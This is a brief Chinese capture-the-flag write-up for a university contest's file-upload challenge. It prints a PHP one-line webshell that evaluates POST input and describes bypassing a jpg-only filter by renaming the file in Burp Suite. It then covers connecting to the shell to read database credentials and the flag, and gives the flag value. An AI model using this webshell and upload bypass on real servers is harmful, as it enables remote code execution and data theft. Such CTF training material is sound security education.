题目名称 第三届“百越杯”福建省高校网络空间安全大赛Do you know upload？

上传文件，多次尝试发现只能上传jpg文件 考虑为白名单绕过

构造hack.php

内容为一句话木马

<?php @eval($_POST['cmd'])?>

 

注意大小写 不要写成post  因为php是区分大小写的

改后缀为jpg上传 burpsuite再抓包修改文件名为hack.php

gogogo 成功上传

输入url 密码连接成功后 找到数据库账户密码

右键

 

 可找到flag文件 点击执行 最后得到flag

flag{5f15dc82-f2f0-47b1-8f68-5aabf63cb973}